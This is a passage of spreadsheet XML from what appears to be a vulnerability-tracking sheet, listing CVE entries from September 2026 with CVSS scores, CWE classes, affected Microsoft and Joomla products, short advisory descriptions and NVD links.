r="F363" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G363" s="5" t="inlineStr" /><c r="H363" s="5" t="n"><v>0.006</v></c><c r="I363" s="5" t="inlineStr" /><c r="J363" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K36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363" s="5" t="inlineStr" /><c r="M363" s="5" t="inlineStr" /><c r="N363" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O363" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P363" s="5" t="inlineStr" /><c r="Q363" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R363" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S363" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77495</t></is></c></row><row r="364"><c r="A364" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B364" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C364" s="5" t="inlineStr"><is><t>CVE-2026-77504</t></is></c><c r="D364" s="5" t="n"><v>8.800000000000001</v></c><c r="E364" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F364" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G364" s="5" t="inlineStr" /><c r="H364" s="5" t="n"><v>0.006</v></c><c r="I364" s="5" t="inlineStr" /><c r="J364" s="5" t="inlineStr" /><c r="K364" s="5" t="inlineStr" /><c r="L364" s="5" t="inlineStr" /><c r="M364" s="5" t="inlineStr" /><c r="N364" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O364" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P364" s="5" t="inlineStr" /><c r="Q364" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="R364" s="5" t="inlineStr"><is><t>Double free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S364" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77504</t></is></c></row><row r="365"><c r="A365" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B365" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C365" s="5" t="inlineStr"><is><t>CVE-2026-77826</t></is></c><c r="D365" s="5" t="n"><v>8.800000000000001</v></c><c r="E365" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F365" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G365" s="5" t="inlineStr" /><c r="H365" s="5" t="n"><v>0.003</v></c><c r="I365" s="5" t="inlineStr" /><c r="J365" s="5" t="inlineStr" /><c r="K365" s="5" t="inlineStr" /><c r="L365" s="5" t="inlineStr" /><c r="M365" s="5" t="inlineStr" /><c r="N365" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O365" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P365" s="5" t="inlineStr" /><c r="Q365" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="R365" s="5" t="inlineStr"><is><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is></c><c r="S365" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77826</t></is></c></row><row r="366"><c r="A366" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B366" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C366" s="5" t="inlineStr"><is><t>CVE-2026-77901</t></is></c><c r="D366" s="5" t="n"><v>8.800000000000001</v></c><c r="E366" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F366" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G366" s="5" t="inlineStr" /><c r="H366" s="5" t="n"><v>0.006</v></c><c r="I366" s="5" t="inlineStr" /><c r="J366" s="5" t="inlineStr" /><c r="K366" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L366" s="5" t="inlineStr" /><c r="M366" s="5" t="inlineStr" /><c r="N366" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O366" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P366" s="5" t="inlineStr" /><c r="Q366" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="R366" s="5" t="inlineStr"><is><t>Null pointer dereference in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S366" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77901</t></is></c></row><row r="367"><c r="A367" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B367" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C367" s="5" t="inlineStr"><is><t>CVE-2026-77906</t></is></c><c r="D367" s="5" t="n"><v>8.800000000000001</v></c><c r="E367" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F367" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G367" s="5" t="inlineStr" /><c r="H367" s="5" t="n"><v>0.008</v></c><c r="I367" s="5" t="inlineStr" /><c r="J367" s="5" t="inlineStr" /><c r="K367" s="5" t="inlineStr"><is><t>microsoft:visual_studio_2026</t></is></c><c r="L367" s="5" t="inlineStr" /><c r="M367" s="5" t="inlineStr" /><c r="N367" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O367" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P367" s="5" t="inlineStr" /><c r="Q367" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R367" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S367" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77906</t></is></c></row><row r="368"><c r="A368" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B368" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C368" s="5" t="inlineStr"><is><t>CVE-2026-77907</t></is></c><c r="D368" s="5" t="n"><v>8.800000000000001</v></c><c r="E368" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F368" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G368" s="5" t="inlineStr" /><c r="H368" s="5" t="n"><v>0.005</v></c><c r="I368" s="5" t="inlineStr" /><c r="J368" s="5" t="inlineStr" /><c r="K368" s="5" t="inlineStr"><is><t>microsoft:visual_studio_2026</t></is></c><c r="L368" s="5" t="inlineStr" /><c r="M368" s="5" t="inlineStr" /><c r="N368" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O368" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P368" s="5" t="inlineStr" /><c r="Q368" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R368" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S368" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77907</t></is></c></row><row r="369"><c r="A369" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B369" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C369" s="5" t="inlineStr"><is><t>CVE-2026-77908</t></is></c><c r="D369" s="5" t="n"><v>8.800000000000001</v></c><c r="E369" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F369" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G369" s="5" t="inlineStr" /><c r="H369" s="5" t="n"><v>0.007</v></c><c r="I369" s="5" t="inlineStr" /><c r="J369" s="5" t="inlineStr" /><c r="K369" s="5" t="inlineStr" /><c r="L369" s="5" t="inlineStr" /><c r="M369" s="5" t="inlineStr" /><c r="N369" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O369" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P369" s="5" t="inlineStr" /><c r="Q369" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="R369" s="5" t="inlineStr"><is><t>Improper control of generation of code ('code injection') in Microsoft Dynamics 365 allows an authorized attacker to execute code over a network.</t></is></c><c r="S369" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77908</t></is></c></row><row r="370"><c r="A370" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B370" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C370" s="5" t="inlineStr"><is><t>CVE-2026-78074</t></is></c><c r="D370" s="5" t="n"><v>8.800000000000001</v></c><c r="E370" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F370" s="5" t="inlineStr"><is><t>security@joomla.org</t></is></c><c r="G370" s="5" t="inlineStr" /><c r="H370" s="5" t="n"><v>0.003</v></c><c r="I370" s="5" t="inlineStr" /><c r="J370" s="5" t="inlineStr" /><c r="K370" s="5" t="inlineStr" /><c r="L370" s="5" t="inlineStr" /><c r="M370" s="5" t="inlineStr" /><c r="N370" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O370" s="5" t="inlineStr"><is><t>2026-08-31</t></is></c><c r="P370" s="5" t="inlineStr" /><c r="Q370" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="R370" s="5" t="inlineStr"><is><t>Joomla Extension - miniorgange.com - Unauthenticated arbitrary extension deinstallation via various miniOrange extensions - a missing authentication check allows unauthenticated actors to delete arbitrary installed extensions. Only the free versions of the miniOrange plugins are affected.</t></is></c><c r="S370" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78074</t></is></c></row><row r="371"><c r="A371" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B371" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C371" s="5" t="inlineStr"><is><t>CVE-2026-78439</t></is></c><c r="D371" s="5" t="n"><v>8.800000000000001</v></c><c r="E371" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F371" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G371" s="5" t="inlineStr" /><c r="H371" s="5" t="n"><v>0.006</v></c><c r="I371" s="5" t="inlineStr" /><c r="J371" s="5" t="inlineStr" /><c r="K371" s="5" t="inlineStr" /><c r="L371" s="5" t="inlineStr" /><c r="M371" s="5" t="inlineStr" /><c r="N371" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O371" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P371" s="5" t="inlineStr" /><c r="Q371" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="R371" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S371" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78439</t></is></c></row><row r="372"><c r="A372" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B372" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C372" s="5" t="inlineStr"><is><t>CVE-2026-78442</t></is></c><c r="D372" s="5" t="n"><v>8.800000000000001</v></c><c r="E372" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F372" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G372" s="5" t="inlineStr" /><c r="H372" s="5" t="n"><v>0.006</v></c><c r="I372" s="5" t="inlineStr" /><c r="J372" s="5" t="inlineStr" /><c r="K372" s="5" t="inlineStr" /><c r="L372" s="5" t="inlineStr" /><c r="M372" s="5" t="inlineStr" /><c r="N372" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O372" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P372" s="5" t="inlineStr" /><c r="Q372" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R372" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows OLE DB allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S372" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78442</t></is></c></row><row r="373"><c r="A373" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B373" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C373" s="5" t="inlineStr"><is><t>CVE-2026-78456</t></is></c><c r="D373" s="5" t="n"><v>8.800000000000001</v></c><c r="E373" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F373" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G373" s="5" t="inlineStr" /><c r="H373" s="5" t="n"><v>0.008999999999999999</v></c><c r="I373" s="5" t="inlineStr" /><c r="J373" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K373" s="5" t="inlineStr"><is><t>microsoft:sql_server_2022</t></is></c><c r="L373" s="5" t="inlineStr" /><c r="M373" s="5" t="inlineStr" /><c r="N373" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O373" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P373" s="5" t="inlineStr" /><c r="Q373" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R373" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="S373" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78456</t></is></c></row><row r="374"><c r="A374" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B374" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C374" s="5" t="inlineStr"><is><t>CVE-2026-78462</t></is></c><c r="D374" s="5" t="n"><v>8.800000000000001</v></c><c r="E374" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F374" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G374" s="5" t="inlineStr" /><c r="H374" s="5" t="n"><v>0.005</v></c><c r="I374" s="5" t="inlineStr" /><c r="J374" s="5" t="inlineStr" /><c r="K374" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L374" s="5" t="inlineStr" /><c r="M374" s="5" t="inlineStr" /><c r="N374" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O374" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P374" s="5" t="inlineStr" /><c r="Q374" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="R374" s="5" t="inlineStr"><is><t>Authorization bypass through user-controlled key in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="S374" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78462</t></is></c></row><row r="375"><c r="A375" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B375" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C375" s="5" t="inlineStr"><is><t>CVE-2026-78463</t></is></c><c r="D375" s="5" t="n"><v>8.800000000000001</v></c><c r="E375" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F375" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G375" s="5" t="inlineStr" /><c r="H375" s="5" t="n"><v>0.008999999999999999</v></c><c r="I375" s="5" t="inlineStr" /><c r="J375" s="5" t="inlineStr" /><c r="K375" s="5" t="inlineStr" /><c r="L375" s="5" t="inlineStr" /><c r="M375" s="5" t="inlineStr" /><c r="N375" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O375" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P375" s="5" t="inlineStr" /><c r="Q375" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="R375" s="5" t="inlineStr"><is><t>Improper control of generation of code ('code injection') in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S375" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78463</t></is></c></row><row r="376"><c r="A376" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B376" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C376" s="5" t="inlineStr"><is><t>CVE-2026-78504</t></is></c><c r="D376" s="5" t="n"><v>8.800000000000001</v></c><c r="E376" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F376" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G376" s="5" t="inlineStr" /><c r="H376" s="5" t="n"><v>0.006</v></c><c r="I376" s="5" t="inlineStr" /><c r="J376" s="5" t="inlineStr" /><c r="K376" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L376" s="5" t="inlineStr" /><c r="M376" s="5" t="inlineStr" /><c r="N376" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O376" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P376" s="5" t="inlineStr" /><c r="Q376" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="R376" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S376" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78504</t></is></c></row><row r="377"><c r="A377" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B377" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C377" s="5" t="inlineStr"><is><t>CVE-2026-78505</t></is></c><c r="D377" s="5" t="n"><v>8.800000000000001</v></c><c r="E377" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F377" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G377" s="5" t="inlineStr" /><c r="H377" s="5" t="n"><v>0.008</v></c><c r="I377" s="5" t="inlineStr" /><c r="J377" s="5" t="inlineStr" /><c r="K377" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L377" s="5" t="inlineStr" /><c r="M377" s="5" t="inlineStr" /><c r="N377" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O377" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P377" s="5" t="inlineStr" /><c r="Q377" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R377" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S377" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78505</t></is></c></row><row r="378"><c r="A378" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B378" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C378" s="5" t="inlineStr"><is><t>CVE-2026-78507</t></is></c><c r="D378" s="5" t="n"><v>8.800000000000001</v></c><c r="E378" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F378" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G378" s="5" t="inlineStr" /><c r="H378" s="5" t="n"><v>0.006</v></c><c r="I378" s="5" t="inlineStr" /><c r="J378" s="5" t="inlineStr" /><c r="K378" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L378" s="5" t="inlineStr" /><c r="M378" s="5" t="inlineStr" /><c r="N378" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O378" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P378" s="5" t="inlineStr" /><c r="Q378" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R378" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S378" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78507</t></is></c></row><row r="379"><c r="A379" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B379" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C379" s="5" t="inlineStr"><is><t>CVE-2026-78511</t></is></c><c r="D379" s="5" t="n"><v>8.800000000000001</v></c><c r="E379" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F379" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G379" s="5" t="inlineStr" /><c r="H379" s="5" t="n"><v>0.008</v></c><c r="I379" s="5" t="inlineStr" /><c r="J379" s="5" t="inlineStr" /><c r="K379" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L379" s="5" t="inlineStr" /><c r="M379" s="5" t="inlineStr" /><c r="N379" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O379" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P379" s="5" t="inlineStr" /><c r="Q379" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R379" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S379" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78511</t></is></c></row><row r="380"><c r="A380" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B380" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C380" s="5" t="inlineStr"><is><t>CVE-2026-78512</t></is></c><c r="D380" s="5" t="n"><v>8.800000000000001</v></c><c r="E380" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F380" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G380" s="5" t="inlineStr" /><c r="H380" s="5" t="n"><v>0.008</v></c><c r="I380" s="5" t="inlineStr" /><c r="J380" s="5" t="inlineStr" /><c r="K380" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L380" s="5" t="inlineStr" /><c r="M380" s="5" t="inlineStr" /><c r="N380" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O380" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P380" s="5" t="inlineStr" /><c r="Q380" s="5" t="inlineStr"><is><t>CWE-122, CWE-197</t></is></c><c r="R380" s="5" t="inlineStr"><is><t>Numeric truncation error in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S380" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78512</t></is></c></row><row r="381"><c r="A381" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B381" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C381" s="5" t="inlineStr"><is><t>CVE-2026-78514</t></is></c><c r="D381" s="5" t="n"><v>8.800000000000001</v></c><c r="E381" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F381" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G381" s="5" t="inlineStr" /><c r="H381" s="5" t="n"><v>0.006</v></c><c r="I381" s="5" t="inlineStr" /><c r="J381" s="5" t="inlineStr" /><c r="K381" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L381" s="5" t="inlineStr" /><c r="M381" s="5" t="inlineStr" /><c r="N381" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O381" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P381" s="5" t="inlineStr" /><c r="Q381" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R381" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S381" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78514</t></is></c></row><row r="382"><c r="A382" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B382" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C382" s="5" t="inlineStr"><is><t>CVE-2026-78517</t></is></c><c r="D382" s="5" t="n"><v>8.800000000000001</v></c><c r="E382" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F382" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G382" s="5" t="inlineStr" /><c r="H382" s="5" t="n"><v>0.006</v></c><c r="I382" s="5" t="inlineStr" /><c r="J382" s="5" t="inlineStr" /><c r="K382" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L382" s="5" t="inlineStr" /><c r="M382" s="5" t="inlineStr" /><c r="N382" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O382" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P382" s="5" t="inlineStr" /><c r="Q382" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R382" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S382" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78517</t></is></c></row><row r="383"><c r="A383" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B383" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C383" s="5" t="inlineStr"><is><t>CVE-2026-78518</t></is></c><c r="D383" s="5" t="n"><v>8.800000000000001</v></c><c r="E383" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F383" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G383" s="5" t="inlineStr" /><c r="H383" s="5" t="n"><v>0.008999999999999999</v></c><c r="I383" s="5" t="inlineStr" /><c r="J383" s="5" t="inlineStr" /><c r="K383" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L383" s="5" t="inlineStr" /><c r="M383" s="5" t="inlineStr" /><c r="N383" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O383" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P383" s="5" t="inlineStr" /><c r="Q383" s="5" t="inlineStr"><is><t>CWE-125, CWE-20</t></is></c><c r="R383" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S383" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78518</t></is></c></row><row r="384"><c r="A384" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B384" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C384" s="5" t="inlineStr"><is><t>CVE-2026-78519</t></is></c><c r="D384" s="5" t="n"><v>8.800000000000001</v></c><c r="E384" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F384" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G384" s="5" t="inlineStr" /><c r="H384" s="5" t="n"><v>0.006</v></c><c r="I384" s="5" t="inlineStr" /><c r="J384" s="5" t="inlineStr" /><c r="K384" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:outlook</t></is></c><c r="L384" s="5" t="inlineStr" /><c r="M384" s="5" t="inlineStr" /><c r="N384" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O384" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P384" s="5" t="inlineStr" /><c r="Q384" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="R384" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S384" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78519</t></is></c></row><row r="385"><c r="A385" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B385" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C385" s="5" t="inlineStr"><is><t>CVE-2026-78521</t></is></c><c r="D385" s="5" t="n"><v>8.800000000000001</v></c><c r="E385" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F385" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G385" s="5" t="inlineStr" /><c r="H385" s="5" t="n"><v>0.006</v></c><c r="I385" s="5" t="inlineStr" /><c r="J385" s="5" t="inlineStr" /><c r="K385" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L385" s="5" t="inlineStr" /><c r="M385" s="5" t="inlineStr" /><c r="N385" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O385" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P385" s="5" t="inlineStr" /><c r="Q385" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R385" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S385" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78521</t></is></c></row><row r="386"><c r="A386" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B386" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C386" s="5" t="inlineStr"><is><t>CVE-2026-78524</t></is></c><c r="D386" s="5" 